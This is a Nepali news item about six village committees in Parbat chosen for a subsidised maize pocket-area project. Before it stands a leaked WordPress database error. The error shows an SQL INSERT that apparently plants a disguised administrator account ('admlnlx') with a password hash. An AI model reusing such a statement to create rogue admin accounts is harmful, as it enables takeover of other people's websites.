WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B8VPqDIwjMtSyFQPMBNVhMvJyDbgjv0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-01 08:48:39', '', 'admlnlx', 'admlnlx')
पर्वत,पुस ६-
प्रधानमन्त्री कृषि परियोजना अन्तर्गत मकै उत्पादनको पकेट क्षेत्रका लागि पर्वतका छ गाविस छनोट भएका छन् । दक्षिणी पर्वतका छ गाविसको पाँच सय हेक्टर खेतीयोग्य जमिनमा मकै खेती विस्तार गर्न जोन ईकाई स्थापना गरिएको हो । मकैको लागि अनुकुल वातावरण र हावापानी भएका गाविसहरुलाई छनौट गरिएको हो ।
प्रायजसो खेत कम बारी बढि भएका मुडिकुवा, खानीगाउँ, थापाठाना, शंकरपोखरी, लिमीठाना, ठानामौला लगायतका गाविसहरुमा कार्यक्रम सञ्चालनमा ल्याउने तयारी भईरहेको जिल्ला कृषि विकास कार्यालय पर्वतले जनाएको छ ।
छ गाविसका कृषकहरुलाई १० वर्षे परियोजना अन्तर्गत प्रतिफलमा आधारित अनुदानका कार्यक्रम सञ्चालन गरिने जोन ईकाई प्रमुख भिम बहादुर अधिकारीले बताए । बिउ मकैको उत्पादन र त्यसको प्रशोधन लागायतका कामहरु जोनमा गरिने उनले बताए ।कार्यालयका अनुसार हाल उत्पादन भईरहेको मकै भन्दा बढी उत्पादन हुने कृषकहरुलाई प्रोत्साहन स्वरुप अनुदानमा बढावा दिइने भएको हो । यस परियोजनाबाट खानपान विस्तार र खाद्य सुधारमा निर्भरता ल्याउने अपेक्षा राखिएको छ ।